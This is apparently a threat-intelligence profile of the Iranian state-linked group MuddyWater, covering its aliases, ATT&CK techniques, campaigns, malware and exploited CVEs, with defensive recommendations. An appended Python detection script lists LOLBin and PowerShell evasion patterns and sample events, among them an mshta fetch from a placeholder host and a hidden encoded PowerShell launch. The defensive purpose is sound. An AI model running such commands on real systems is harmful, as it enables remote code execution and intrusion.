G0069

MuddyWater

Aliases: Seedworm · Static Kitten · TEMP.Zagros · Earth Vetala · MERCURY · Mango Sandstorm · TA450 · Boggy Serpens · ATK51 · COBALT ULSTER

🔴 Active Campaign
State-sponsored · Capability: Moderate · Sponsor: Iranian Ministry of Intelligence and Security (MOIS) / Iran · Rating: A1
Cut-off: April 12, 2026 · TLP:AMBER

Diamond Model

Adversary

Iranian MOIS · Active since 2017 · Multi-cluster conglomerate

Infrastructure

RMM tools · Cloud C2 · Compromised email · Telegram API

Victim

Gov · Telecom · Defense · Energy · Maritime · Finance

Capability

Custom malware + RMM abuse + LOLBins · Rust-based implants (2026)

Regional Espionage & Pre-Positioning

Motive & Objectives

  • Espionage
  • Intelligence collection
  • Pre-positioning / disruption
  • Destructive operations (via DEV-1084)
  • Sanctions evasion support

Sector Proximity

  • Government / think tanks: Primary MOIS intelligence collection target

  • Global telecommunications: Core long-term target set since 2017

  • Defense technology / high-tech startups: Defense supply chain targeted Feb 2026

  • Higher education / research institutions: Universities targeted; Technion 2023 disruptive attack

  • Venture capital / investment: US bank targeted Feb 2026; financial sector exposure

Capability Assessment

  • Tooling: High
  • Persistence: Moderate
  • Attribution evasion: High
  • Zero-days: Low

Malware Lineage

  • POWERSTATS (PowerShell backdoor)
  • MuddyC2Go (C2 framework)
  • PhonyC2 (C2 framework)
  • DarkBeatC2 (C2 framework)
  • BugSleep
  • MuddyViper
  • RustyWater (Rust-based RAT)
  • Dindoor (Deno/JS backdoor)
  • CHAR / GhostFetch / HTTP_VIP (Op Olalampo)
  • BlackBeard (Rust backdoor)
  • Nuso (custom HTTP backdoor)

Key TTPs (MITRE ATT&CK)

Initial Access

  • T1566.001 Phishing: Spearphishing Attachment · Word docs, malicious Office attachments, ZIP archives
  • T1566.002 Phishing: Spearphishing Link · Malicious links in email bodies
  • T1190 Exploit Public-Facing Application · Log4Shell, ProxyShell, PaperCut (CVE-2023-27350)
  • T1195.002 Supply Chain Compromise: Software Supply Chain · Rashim IT provider compromise (2021)
  • T1078 Valid Accounts · Compromised email accounts used for phishing delivery

Execution

  • T1059.001 Command and Scripting Interpreter: PowerShell · POWERSTATS; core technique across all years
  • T1059.005 Command and Scripting Interpreter: Visual Basic · VBScript loaders
  • T1059.007 Command and Scripting Interpreter: JavaScript · Dindoor via Deno runtime; Tsundere Botnet Node.js
  • T1204.002 User Execution: Malicious File · Victim must open malicious Office document
  • T1218.005 System Binary Proxy Execution: Mshta · LOLBin abuse
  • T1218.010 System Binary Proxy Execution: Regsvr32 · LOLBin abuse
  • T1218.011 System Binary Proxy Execution: Rundll32 · LOLBin abuse

Persistence

  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys · Registry run key persistence
  • T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL · Observed in toolkit
  • T1219 Remote Access Software · Atera, ConnectWise, SimpleHelp, N-able, MeshCentral, PDQ, Action1

Defense Evasion

  • T1027 Obfuscated Files or Information · Encoded/encrypted PowerShell; obfuscated scripts
  • T1562.001 Impair Defenses: Disable or Modify Tools · Security software termination
  • T1036 Masquerading · Stolen code-signing certificates on backdoors
  • T1197 BITS Jobs · Observed in toolkit

Credential Access

  • T1003 OS Credential Dumping · LaZagne, Mimikatz-equivalent tooling
  • T1003.001 OS Credential Dumping: LSASS Memory · LSASS access for credential harvesting
  • T1528 Steal Application Access Token · Custom Chromium-based credential stealer (2025) targeting Chrome, Brave, Edge, Opera

Discovery

  • T1083 File and Directory Discovery · Standard enumeration post-access
  • T1057 Process Discovery · Pre-exfiltration enumeration

Lateral Movement

  • T1021.001 Remote Services: Remote Desktop Protocol · Post-compromise lateral movement

Collection

  • T1113 Screen Capture · CCTV/camera access prior to kinetic operations (Amazon TI, 2024)

Command and Control

  • T1071.001 Application Layer Protocol: Web Protocols · HTTP/S-based C2 (MuddyC2Go, DarkBeatC2)
  • T1102 Web Service · Telegram bot C2 (Operation Olalampo); cloud hosting
  • T1573 Encrypted Channel · Encrypted C2 communications
  • T1090 Proxy · Chisel, PLink, FRP for tunneling; reverse proxy chains

Exfiltration

  • T1048 Exfiltration Over Alternative Protocol · Rclone to Wasabi cloud storage (Feb 2026)
  • T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage · Wasabi cloud storage bucket (Dindoor campaign)

Victimology

  • Government agencies & ministries · Primary target across Middle East, MENA, Europe, North America

  • Telecommunications providers · Core target since first campaigns 2017

  • Defense & aerospace · Defense supply chain firm targeted Feb 2026; US defense contractors

  • Energy / oil & gas · Persistent maritime/energy targeting in Middle East 2025-2026

  • Financial services · US bank backdoored ahead of Operation Epic Fury

  • Critical infrastructure (aviation) · US airport targeted Feb 2026 during pre-positioning phase

  • Healthcare · Shamir Medical Center (Israel) Oct 2025 via Iranian actors

  • Higher education · Technion Institute destructive attack Feb 2023

Geographic Focus

Middle East (primary) · United States · Israel · MENA · South/Central Asia · Europe · Africa

Activity Timeline

  1. 2026-03 · Rating: B2

    Unit 42 (Boggy Serpens) reports refined operations: trusted-relationship compromises, wider maritime/aviation/financial targeting, Rust-based Nuso malware

    Source: Unit 42, Palo Alto Networks

  2. 2026-03-05 · Rating: A1

    Symantec/Broadcom documents MuddyWater activity in US bank, US airport, Canadian NGO, and Israeli ops of US defense software supplier; Dindoor backdoor identified

    Source: Symantec / Broadcom

  3. 2026-03 · Rating: B2

    Check Point Research publishes analysis linking MuddyWater to criminal tooling ecosystem and Tsundere Botnet; misattribution risk highlighted

    Source: Check Point Research

  4. 2026-02-26 · Rating: B2

    Operation Olalampo (Group-IB): MENA cyberespionage campaign launched Jan 26 2026 with CHAR, GhostFetch, HTTP_VIP, GhostBackDoor; Telegram bot C2

    Source: Group-IB

  5. 2026-02 · Rating: A1

    Pre-positioning confirmed in US critical infrastructure starting early February, weeks ahead of Operation Epic Fury kinetic strikes (Feb 28)

    Source: Symantec / Broadcom

  6. 2026-01 · Rating: B2

    CloudSEK documents RustyWater campaign targeting Israeli diplomatic, maritime, telecom, financial entities; Rust-based RAT with Hebrew-language lures; expansion to India, UAE

    Source: CloudSEK

  7. 2025-10 · Rating: B2

    Phoenix backdoor campaign: compromised mailbox used to send malicious Word docs across MENA; 100+ government entities targeted

    Source: The Register / Multiple

  8. 2025-10 · Rating: B2

    Shamir Medical Center (Israel) hit by attack later linked to Iranian actors; initially misclassified as Qilin ransomware

    Source: Check Point Research

  9. 2025-08 to 2026-02 · Rating: B2

    Four-wave sustained campaign against Middle East maritime/energy company (Boggy Serpens); AI-assisted code development; BlackBeard Rust backdoor

    Source: Unit 42

  10. 2025-03 · Rating: B2

    HarfangLab documents Atera RMM agent campaign; spear-phishing delivery of RMM installers in password-protected archives

    Source: HarfangLab

  11. 2024-11 · Rating: B2

    Amazon Threat Intelligence correlates MuddyWater CCTV access with subsequent missile strikes in Israel and Red Sea; establishes ISR role in kinetic ops

    Source: Amazon Threat Intelligence

  12. 2024-09 to 2025-03 · Rating: B2

    MuddyViper backdoor deployed against Israeli organizations (ESET December 2024 disclosure)

    Source: ESET

  13. 2024-04 · Rating: B2

    DarkBeatC2 framework documented by Deep Instinct

    Source: Deep Instinct

  14. 2024-03 · Rating: B2

    TA450 spear-phishing campaign using PDF attachments with embedded links (Proofpoint)

    Source: Proofpoint

  15. 2023-11 · Rating: B2

    MuddyC2Go C2 framework spotted in Israel (Deep Instinct)

    Source: Deep Instinct

  16. 2023-06 · Rating: B2

    PhonyC2 C2 framework documented by Deep Instinct

    Source: Deep Instinct

  17. 2023-02 · Rating: B2

    Technion – Israel Institute of Technology destructive attack; false ransomware persona "DarkBit"; MERCURY + DEV-1084 collaboration (Microsoft)

    Source: Microsoft / Israel NCD

  18. 2022-02 · Rating: A1

    Joint advisory AA22-055A: FBI, CISA, NSA, CNMF, NCSC-UK formally attribute MuddyWater to Iranian MOIS

    Source: CISA / FBI / NSA / NCSC-UK

  19. 2022-01 · Rating: A1

    CNMF advisory: Iranian intel cyber suite uses open-source tools

    Source: US Cyber Command CNMF

  20. 2021-09 · Rating: A1

    US Treasury OFAC sanctions MOIS and Iran's intelligence minister, citing MuddyWater activity

    Source: US Treasury

  21. ~2020 to 2022 · Rating: B2

    Pivot to RMM tool abuse (ScreenConnect, Syncro, RemoteUtilities) for persistence and evasion; cloud C2 introduced

    Source: Multiple vendors

  22. ~2017 · Rating: B2

    First documented campaigns; POWERSTATS PowerShell backdoor; Saudi Arabia, Iraq, Israel, UAE, Turkey, India, US

    Source: Palo Alto Networks 2017

Do What (Now What)

  1. Hunt for RMM tool anomalies immediately

    Audit all RMM software (Atera, ConnectWise, SimpleHelp, N-able, Action1, PDQ, MeshCentral) deployed in your environment. Confirm every installed instance was authorized through your IT procurement process. Flag any unrecognized installs for immediate investigation, as MuddyWater routinely deploys RMM agents via spear-phishing without IT knowledge.

  2. Implement behavioral detection for LOLBin and PowerShell abuse

    Deploy SIEM rules hunting for mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe executing encoded or remote payloads. Tune for PowerShell with `-EncodedCommand`, `-WindowStyle Hidden`, and `-ExecutionPolicy Bypass` flags. This targets MuddyWater's most consistent technique pattern across all campaign years.

  3. Block and monitor Deno / Node.js runtime execution in production environments

    The Dindoor backdoor executes via Deno; Tsundere Botnet uses Node.js. Neither runtime should be present on standard enterprise endpoints. Application whitelisting that blocks unapproved JavaScript runtimes directly disrupts this specific TTP cluster.

  4. Prioritize phishing-resistant MFA and email security hardening

    Spear-phishing remains MuddyWater's dominant initial access vector. Implement DMARC/DKIM/SPF enforcement, sandbox detonation for all attachments, and disable Office macro execution for documents from external sources. The October 2025 Phoenix campaign used a compromised mailbox — monitor for anomalous send volume from internal accounts.

  5. Conduct threat-informed purple team exercise targeting G0069 TTPs

    Commission an adversary simulation exercise using MITRE ATT&CK G0069 as the threat model. Focus kill-chain coverage assessment on: RMM persistence (T1219), PowerShell execution (T1059.001), credential dumping (T1003), and cloud exfiltration (T1567.002). Validate detection coverage before the next escalation cycle, not after.

Technical Evidence

Type Value First Last Confidence
CVE CVE-2020-1472 (Zerologon) 2020-09 2025-01 HIGH
CVE CVE-2023-27350 (PaperCut) 2023-04 2024-06 HIGH
CVE CVE-2021-44228 (Log4Shell) 2021-12 2023-06 HIGH
CVE CVE-2017-0199 (Office RTF) 2017-04 2023-01 HIGH
CVE CVE-2021-26855 (ProxyShell chain) 2021-03 2023-01 MODERATE
CVE CVE-2021-36260 (Hikvision camera) 2021-09 2026-03 MODERATE
CVE CVE-2025-34067 (Dahua/Hikvision camera) 2025-01 2026-03 MODERATE
Tool Rclone (cloud exfil) 2022-01 2026-02 HIGH
Tool LaZagne (credential dump) 2020-01 2026-01 HIGH
Tool Chisel / PLink / FRP (tunneling) 2021-01 2026-01 HIGH
Infra Wasabi cloud storage (exfil target) 2026-02 2026-02 HIGH
Malware POWERSTATS (PowerShell backdoor) 2017-01 2025-06 HIGH
Malware MuddyC2Go (Golang C2) 2023-11 2025-01 HIGH
Malware DarkBeatC2 (C2 framework) 2024-04 2025-06 HIGH
Malware BugSleep 2024-01 2025-06 HIGH
Malware MuddyViper 2024-09 2025-03 HIGH
Malware RustyWater (Rust RAT) 2026-01 2026-03 HIGH
Malware Dindoor (Deno backdoor) 2026-02 2026-03 HIGH
Malware CHAR / GhostFetch / HTTP_VIP 2026-01 2026-03 MODERATE
Malware BlackBeard (Rust backdoor) 2025-08 2026-02 MODERATE
Malware Phoenix backdoor 2025-10 2026-01 MODERATE
Malware DCHSpy surveillanceware 2025-07 2025-12 MODERATE

Full Analysis

Executive Summary

Intelligence Cut-off Date: 12-Apr-2026

MuddyWater is an Iranian state-sponsored advanced persistent threat group assessed with high confidence to be a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS). Operating continuously since at least 2017 under numerous vendor aliases, the group conducts broad cyber espionage campaigns targeting government, telecommunications, defense, energy, and critical infrastructure sectors across the Middle East, North Africa, Europe, and North America. As of early 2026, MuddyWater has escalated significantly: the group pre-positioned backdoors inside US financial, aviation, and defense supply chain networks ahead of the February 28 Operation Epic Fury kinetic strikes, demonstrating a clear capability and mandate to transition from espionage to disruptive operations on short notice.

Overall Assessment: [Confidence: HIGH] — Attribution to MOIS is formally confirmed by a joint FBI/CISA/NSA/CNMF/NCSC-UK advisory (AA22-055A, 2022). Ongoing 2026 campaign activity is documented by Symantec/Broadcom (March 2026), Group-IB (February 2026), Unit 42/Palo Alto (March 2026), and Check Point Research (March 2026).


Identity and Attribution

MuddyWater (MITRE G0069) is tracked under a wide range of vendor-assigned names reflecting the fragmented nature of threat intelligence attribution across the industry. Microsoft tracks the group as MERCURY (legacy) and Mango Sandstorm (current). Proofpoint designates it TA450. CrowdStrike uses the name COBALT ULSTER. Secureworks uses Static Kitten. Mandiant and Google Cloud have tracked it as TEMP.Zagros. Trend Micro tracks the group as Earth Vetala. Unit 42 (Palo Alto Networks) recently introduced Boggy Serpens as a distinct but overlapping designation. All of these names are assessed to refer to the same core actor or closely related sub-clusters operating under MOIS direction. [Source: MITRE ATT&CK G0069, Rating: A1]

The group was first publicly documented by Palo Alto Networks in November 2017. The name “MuddyWater” was coined because early campaigns were difficult to attribute and were routinely confused with other intrusion sets. [Source: Wikipedia / Palo Alto Networks 2017, Rating: B2]

Formal government attribution to MOIS came in February 2022 through joint advisory AA22-055A, issued by the FBI, CISA, NSA, US Cyber Command’s Cyber National Mission Force (CNMF), and the UK National Cyber Security Centre (NCSC-UK). The advisory described MuddyWater as “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” [Source: CISA Advisory AA22-055A, Rating: A1]

Researchers have characterized MuddyWater as a “conglomerate” composed of several smaller, semi-autonomous clusters that may operate on different regional mandates or objectives. This organizational structure complicates clean attribution: overlapping tooling, shared infrastructure, and criminal ecosystem crossover have repeatedly led to misattribution and confusion among researchers. [Source: Check Point Research, March 2026, Rating: B2]


Motive and Objective

MuddyWater’s primary motive is espionage in support of Iranian strategic intelligence priorities: regional geopolitical monitoring, technology transfer, sanctions evasion support, and tracking of dissidents and dissident networks abroad. The group’s operational mandate aligns tightly with MOIS institutional responsibilities, which were formally expanded in 2017 to include increased activity abroad. [Source: HawkEye Threat Advisory, Rating: B2]

Beyond traditional espionage, MuddyWater has demonstrated a willingness to conduct or facilitate destructive operations when geopolitical conditions warrant. In 2023, Microsoft documented the group (as MERCURY) establishing initial access via Log4Shell exploitation before handing off to a separate cluster (DEV-1084) that executed destructive operations masquerading as ransomware, including the 2023 attack on the Technion – Israel Institute of Technology using the false persona “DarkBit.” [Source: Wikipedia / Microsoft reporting, Rating: B2]

The most significant escalation of objective scope came in early 2026: Symantec/Broadcom documented MuddyWater pre-positioning backdoors inside US critical infrastructure — a bank, an airport, defense aerospace software supply chain operations — weeks before the February 28, 2026 joint US-Israeli military strikes on Iran (Operation Epic Fury). This pre-positioning, combined with the use of previously unknown tooling (Dindoor), indicates that MuddyWater was tasked to hold US targets at risk as a deterrent or retaliatory instrument — not merely to collect intelligence. [Source: Symantec/Broadcom (March 2026), Rating: A1; SC Media (March 2026), Rating: B2]


Victimology

MuddyWater targets span a wide range of sectors with a clear weighting toward government agencies, telecommunications providers, defense organizations, energy and oil-and-gas companies, and critical infrastructure. Recent 2025–2026 campaigns have added financial institutions (US bank), aviation infrastructure (US airport), maritime operators (Middle East energy and marine company), and academic institutions to the documented target set. [Source: MITRE ATT&CK G0069 (A1), Symantec/Broadcom March 2026 (A1), Unit 42 March 2026 (B2)]

Geographically, the primary focus remains the Middle East — Saudi Arabia, UAE, Kuwait, Bahrain, Jordan, Iraq, Israel, Turkey — with documented operations expanding into North Africa (Egypt, Sudan, Tanzania), South and Central Asia, Europe, and North America. Recent 2025 campaigns specifically targeted US manufacturing and transportation sectors. [Source: Picus Security, March 2026, Rating: B2]

The group frequently targets third-party managed service providers and IT contractors as a supply chain entry point to downstream organizations. The 2021 compromise of Israeli IT provider “Rashim” to reach customer organizations is a documented example of this technique. [Source: Picus Security, Rating: B2]

Sector Proximity Assessment:

  • Global telecommunications: Direct — Core long-term target set since 2017 first campaigns; persistent focus across all subsequent years
  • Defense technology / high-tech startups: Direct — Defense aerospace software supplier targeted February 2026; direct overlap with DIB targeting mandate
  • Government / think tanks: Direct — Primary MOIS intelligence collection target; 100+ government entities targeted in single October 2025 campaign
  • Higher education / research institutions: Adjacent — Technion (Israel) destroyed in Feb 2023; universities historically targeted for telecom/defense research access
  • Venture capital / investment: Adjacent — US bank confirmed target February 2026; financial sector exposure via portfolio companies in telecom and defense

Capability Assessment

Rating: Moderate [Confidence: HIGH]

MuddyWater occupies the upper range of the “moderate” capability tier. The group does not routinely exploit zero-day vulnerabilities — its initial access is predominantly n-day exploitation and social engineering — but its tooling breadth, operational persistence, and rapid retooling cycle demonstrate a well-resourced actor that consistently evades detection and maintains long-term access across targeted environments. [Source: MITRE ATT&CK G0069, Rating: A1; Picus Security, Rating: B2]

Key capability indicators supporting this rating:

Tooling breadth and evolution: MuddyWater has developed and rotated through multiple custom C2 frameworks (MuddyC3, PhonyC2, MuddyC2Go, DarkBeatC2) in addition to custom implants (POWERSTATS, BugSleep, MuddyViper, RustyWater, Dindoor, CHAR, GhostFetch, BlackBeard, Nuso). The introduction of Rust-based implants (RustyWater, BlackBeard) in late 2025–2026 represents a meaningful tooling evolution toward more structured, lower-noise capabilities. [Source: CloudSEK January 2026 (B2); Group-IB February 2026 (B2); Unit 42 March 2026 (B2)]

Attribution evasion: The group leverages legitimate RMM tools (Atera, ConnectWise, SimpleHelp, N-able, MeshCentral, PDQ, Action1), code-signed backdoors with stolen certificates, and criminal ecosystem crossover to complicate attribution and defeat signature-based detection. [Source: SC Media March 2026 (B2); Check Point Research March 2026 (B2)]

Operational persistence: Pre-positioned backdoors in US networks were maintained for weeks before kinetic strikes without detection, indicating dwell times consistent with a capable actor. The group conducted four distinct attack waves against a single Middle Eastern maritime/energy target over a six-month period (August 2025–February 2026). [Source: Symantec/Broadcom March 2026 (A1); Unit 42 March 2026 (B2)]

Zero-day gap: No publicly confirmed zero-day exploitation. The group exploits known CVEs (Zerologon, PaperCut, ProxyShell, Log4Shell, CVE-2017-0199) with a pattern of rapid opportunistic exploitation of publicly reported vulnerabilities before organizations have patched. This is the primary downward pressure on the capability rating. [Source: Picus Security (B2); FortiGuard (C3)]


Modus Operandi

Key Campaigns

  • Initial Middle East Campaigns (2017): First documented activity; PowerShell POWERSTATS backdoor targeting Saudi Arabia, Iraq, Israel, UAE, Turkey, US, India, Pakistan
  • RMM Pivot Phase (2022–2023): Shifted primary post-compromise persistence from custom C2 to legitimate RMM tools (ScreenConnect, Syncro, Atera, RemoteUtilities) to evade EDR detection
  • Technion / DarkBit Ransomware (2023-02): MERCURY/DEV-1084 collaboration; destructive attack on Technion using false ransomware persona “DarkBit”; Joint advisory AA22-055A issued same month
  • MuddyC2Go & PhonyC2 Operations (2023-06 to 2024-04): New C2 frameworks deployed against Israeli and regional targets; custom implant refresh cycle indicating active R&D
  • Atera RMM Campaign (2025-03): HarfangLab documented spear-phishing delivery of Atera agent installers in password-protected archives targeting Middle East organizations
  • Phoenix Backdoor Campaign (2025-10): Compromised mailbox used to deliver malicious Word documents across MENA; 100+ government entities targeted; Phoenix backdoor deployed
  • MuddyViper Against Israel (2024-09 to 2025-03): ESET documented MuddyViper backdoor deployment against Israeli organizations
  • RustyWater Campaign (2026-01): Rust-based RAT deployed via spear-phishing targeting Israeli diplomatic, maritime, financial, telecom entities; Hebrew-language lures; evidence of expansion to India, UAE
  • Operation Olalampo (2026-01-26): Group-IB documented MENA-wide campaign; CHAR, GhostFetch, HTTP_VIP, GhostBackDoor malware families; Telegram bot C2
  • US Pre-Positioning / Dindoor (2026-02): Backdoored US bank, US airport, Canadian NGO, defense aerospace software supplier weeks before Operation Epic Fury; Dindoor (Deno runtime) + Rclone exfil to Wasabi cloud
  • Boggy Serpens Maritime Campaign (2025-08 to 2026-02): Four attack waves against single Middle East energy/marine company; AI-assisted code, BlackBeard Rust backdoor, Nuso HTTP backdoor deployed

Tools and Malware

Custom C2 Frameworks (chronological):

  • MuddyC3 — Early custom framework
  • PhonyC2 — Documented June 2023 (Deep Instinct)
  • MuddyC2Go — Golang-based C2; November 2023 (Deep Instinct)
  • DarkBeatC2 — Latest framework iteration; April 2024 (Deep Instinct)

Custom Implants / Backdoors:

  • POWERSTATS — Signature PowerShell-based first-stage backdoor; slowly evolving since 2017
  • BugSleep — Custom implant; documented in 2024
  • MuddyViper — Custom backdoor against Israeli organizations (Sep 2024–Mar 2025; ESET)
  • RustyWater — Rust-based RAT; significant stealth/evasion upgrade; Jan 2026 (CloudSEK)
  • Dindoor — Deno JavaScript runtime backdoor; Feb 2026 (Symantec/Broadcom)
  • BlackBeard — Rust-based backdoor; maritime/energy campaign (Unit 42)
  • CHAR / GhostFetch / HTTP_VIP / GhostBackDoor — Operation Olalampo toolset; Jan 2026 (Group-IB)
  • Nuso — Custom HTTP backdoor; Boggy Serpens maritime campaign (Unit 42)
  • Phoenix — Custom backdoor; October 2025 government campaign
  • DCHSpy — Surveillanceware; documented by Lookout during Israel-Iran conflict

Open Source / LOLBIN Tools:

  • LaZagne (credential dumping)
  • Chisel, PLink, FRP (Fast Reverse Proxy), Ligolo (tunneling)
  • Rclone (cloud exfiltration)
  • Mimikatz-equivalent techniques

Legitimate RMM Tools (abused for persistence):

  • Atera Agent, ConnectWise ScreenConnect, SimpleHelp, N-able, MeshCentral, PDQ, Action1, RemoteUtilities, Syncro

Infrastructure Patterns

MuddyWater’s infrastructure posture is characterized by deliberate obfuscation and layered deniability. The group rotates infrastructure frequently, making IOC-based defenses insufficient as a sole detection strategy. [Source: HawkEye Advisory, Rating: B2]

Key infrastructure patterns include: abuse of compromised email accounts for phishing delivery (appearing to originate from trusted organizations), deployment of RMM tooling to establish persistent access over vendor-legitimate communication channels, use of cloud services (Telegram, Wasabi) for C2 and exfiltration to blend with legitimate traffic, and progressive adoption of commercial VPS hosting for custom C2 frameworks. [Source: MITRE ATT&CK G0069, Rating: A1; Group-IB Feb 2026, Rating: B2]

The Dindoor campaign (February 2026) used Deno runtime execution and code-signing certificates stolen from legitimate vendors to make backdoor activity appear legitimate. Rclone was used to exfiltrate data directly to a Wasabi cloud storage bucket, further avoiding traditional on-premises exfiltration detection. [Source: Symantec/Broadcom March 2026, Rating: A1]

Check Point Research (March 2026) documented overlap between MuddyWater and criminal infrastructure — shared code-signing certificates sourced from the same criminal marketplace as the CastleLoader affiliate ecosystem — suggesting deliberate use of criminal services for attribution obfuscation. [Source: Check Point Research March 2026, Rating: B2]


Forecast, Implications, and Recommendations

What Next (Forecast)

MuddyWater will remain operationally active through 2026 at elevated tempo, driven by the sustained fallout from Operation Epic Fury and the death of Iran’s Supreme Leader. [Confidence: HIGH] The group has demonstrated both the willingness and the capability to pre-position inside US and Western critical infrastructure for retaliatory use, and that posture is unlikely to be abandoned while kinetic and diplomatic tensions remain elevated.

The group’s rapid tooling cycle — introduction of Rust-based implants, Deno-runtime backdoors, AI-assisted code development, and Telegram bot C2 in a single six-month window — signals active R&D investment and suggests additional novel malware families will be deployed in H1–H2 2026. [Confidence: MODERATE] Defenders relying on signature-based detection against prior MuddyWater IOCs will face degraded efficacy.

MuddyWater’s documented use of criminal ecosystem services (shared code-signing certificates, Tsundere Botnet) will likely expand as the group seeks to further complicate attribution and leverage mature criminal infrastructure. [Confidence: MODERATE] This “gray-zone” approach will increase misattribution rates and may create false negatives in attribution workflows that rely on clean actor separation.

So What (Implications)

Any organization operating in the defense supply chain, government contracting, financial services, telecommunications, maritime, or aviation sectors must treat MuddyWater as a credible and active threat rather than a distant geopolitical concern. The February 2026 campaign demonstrated that the group will target US domestic entities (bank, airport) directly — not merely Middle Eastern subsidiaries — when geopolitical conditions warrant. The pre-positioning methodology means organizations may already host dormant access without detection.

The group’s abuse of legitimate RMM tools and code-signed backdoors creates a significant detection gap: activity appears indistinguishable from legitimate IT operations without behavioral analytics. Standard perimeter defenses and signature-based EDR are insufficient.

The correlation between MuddyWater CCTV access and subsequent missile strikes (documented by Amazon Threat Intelligence in November 2024) establishes a direct link between MuddyWater espionage activity and kinetic operations — raising the stakes of a successful intrusion beyond data theft.

Now What (Recommendations)

  1. Hunt for RMM tool anomalies immediately — Audit all RMM software (Atera, ConnectWise, SimpleHelp, N-able, Action1, PDQ, MeshCentral) deployed in your environment. Confirm every installed instance was authorized through your IT procurement process. Flag any unrecognized installs for immediate investigation, as MuddyWater routinely deploys RMM agents via spear-phishing without IT knowledge.

  2. Implement behavioral detection for LOLBin and PowerShell abuse — Deploy SIEM rules hunting for mshta.exe, regsvr32.exe, rundll32.exe, and certutil.exe executing encoded or remote payloads. Tune for PowerShell with -EncodedCommand, -WindowStyle Hidden, and -ExecutionPolicy Bypass flags. This targets MuddyWater’s most consistent technique pattern across all campaign years.

  3. Block and monitor Deno / Node.js runtime execution in production environments — The Dindoor backdoor executes via Deno; Tsundere Botnet uses Node.js. Neither runtime should be present on standard enterprise endpoints. Application whitelisting that blocks unapproved JavaScript runtimes directly disrupts this specific TTP cluster.

  4. Prioritize phishing-resistant MFA and email security hardening — Spear-phishing remains MuddyWater’s dominant initial access vector. Implement DMARC/DKIM/SPF enforcement, sandbox detonation for all attachments, and disable Office macro execution for documents from external sources. The October 2025 Phoenix campaign used a compromised mailbox — monitor for anomalous send volume from internal accounts.

  5. Conduct a threat-informed purple team exercise targeting G0069 TTPs — Commission an adversary simulation exercise using MITRE ATT&CK G0069 as the threat model. Focus kill-chain coverage assessment on: RMM persistence (T1219), PowerShell execution (T1059.001), credential dumping (T1003), and cloud exfiltration (T1567.002). Validate detection coverage before the next escalation cycle, not after.
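As an added example (not the profile's own code, nor any vendor's), the following Python triage of process-creation telemetry implements the behavioral checks from recommendations 1 through 3 against constructed sample events: unauthorized RMM agents, LOLBin/PowerShell abuse, and unapproved JavaScript runtimes. The RMM vendor keywords, the prefix handling for the PowerShell flags, and the sample paths are assumptions of this example, not indicators from the page.

```python
import os
import re

# Recommendation 1: RMM vendors named on the page, matched as executable-name substrings (coarse heuristic).
RMM_VENDOR_KEYWORDS = ("atera", "screenconnect", "connectwise", "simplehelp",
                       "n-able", "action1", "pdq", "meshagent")
# Recommendation 2: LOLBins plus remote/encoded payload indicators worth flagging.
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
PAYLOAD_HINTS = re.compile(r"https?://|\\\\[\w.-]+\\|\s-(?:decode|urlcache)\b|javascript:", re.I)
# powershell.exe accepts unambiguous parameter prefixes (-enc, -w, -ep), so match each flag family.
PS_FLAGS = {
    "-EncodedCommand": re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\b", re.I),
    "-WindowStyle Hidden": re.compile(r"(?:^|\s)[-/](?:w|win|windowstyle)\s+hidden\b", re.I),
    "-ExecutionPolicy Bypass": re.compile(r"(?:^|\s)[-/](?:ep|ex|exec|executionpolicy)\s+bypass\b", re.I),
}
# Recommendation 3: JavaScript runtimes that should not be on standard endpoints.
JS_RUNTIMES = {"deno.exe", "node.exe"}


def triage(events, approved_rmm):
    """Return (rule, image, detail) tuples for process-creation dicts ('image' path, 'cmdline');
    approved_rmm holds lowercase executable names cleared through IT procurement."""
    findings = []
    for ev in events:
        image = os.path.basename(ev["image"].replace("\\", "/")).lower()
        cmd = ev.get("cmdline", "")
        if any(k in image for k in RMM_VENDOR_KEYWORDS) and image not in approved_rmm:
            findings.append(("unauthorized_rmm", image, "not in procurement allowlist"))
        if image in LOLBINS and (hit := PAYLOAD_HINTS.search(cmd)):
            findings.append(("lolbin_remote_or_encoded", image, hit.group(0)))
        if image in ("powershell.exe", "pwsh.exe"):
            flagged = [name for name, rx in PS_FLAGS.items() if rx.search(cmd)]
            if flagged:
                findings.append(("powershell_suspicious_flags", image, ", ".join(flagged)))
        if image in JS_RUNTIMES:
            findings.append(("unapproved_js_runtime", image, "Deno/Node.js on endpoint"))
    return findings


# Constructed sample telemetry (not page IOCs); paths, host and base64 are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe", "cmdline": "AteraAgent.exe"},
    {"image": r"C:\Windows\System32\mshta.exe", "cmdline": 'mshta.exe "http://example.invalid/stage.hta"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc BASE64PLACEHOLDER"},
    {"image": r"C:\Users\alice\AppData\Local\deno\deno.exe", "cmdline": "deno run -A loader.js"},
    {"image": r"C:\Windows\System32\rundll32.exe", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, approved_rmm={"screenconnect.clientservice.exe"}):
        print(finding)
```

The benign rundll32 event produces no finding, which is the point of gating LOLBins on a payload indicator rather than on the binary name alone.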


Technical Evidence

Type | Value | First Seen | Last Seen | Confidence
CVE | CVE-2020-1472 (Zerologon) | 2020-09 | 2025-01 | HIGH
CVE | CVE-2023-27350 (PaperCut) | 2023-04 | 2024-06 | HIGH
CVE | CVE-2021-44228 (Log4Shell) | 2021-12 | 2023-06 | HIGH
CVE | CVE-2017-0199 (Office RTF) | 2017-04 | 2023-01 | HIGH
CVE | CVE-2021-26855 (ProxyShell chain) | 2021-03 | 2023-01 | MODERATE
CVE | CVE-2021-36260 (Hikvision camera) | 2021-09 | 2026-03 | MODERATE
CVE | CVE-2025-34067 (Dahua/Hikvision camera) | 2025-01 | 2026-03 | MODERATE
Tool | Rclone (cloud exfil) | 2022-01 | 2026-02 | HIGH
Tool | LaZagne (credential dump) | 2020-01 | 2026-01 | HIGH
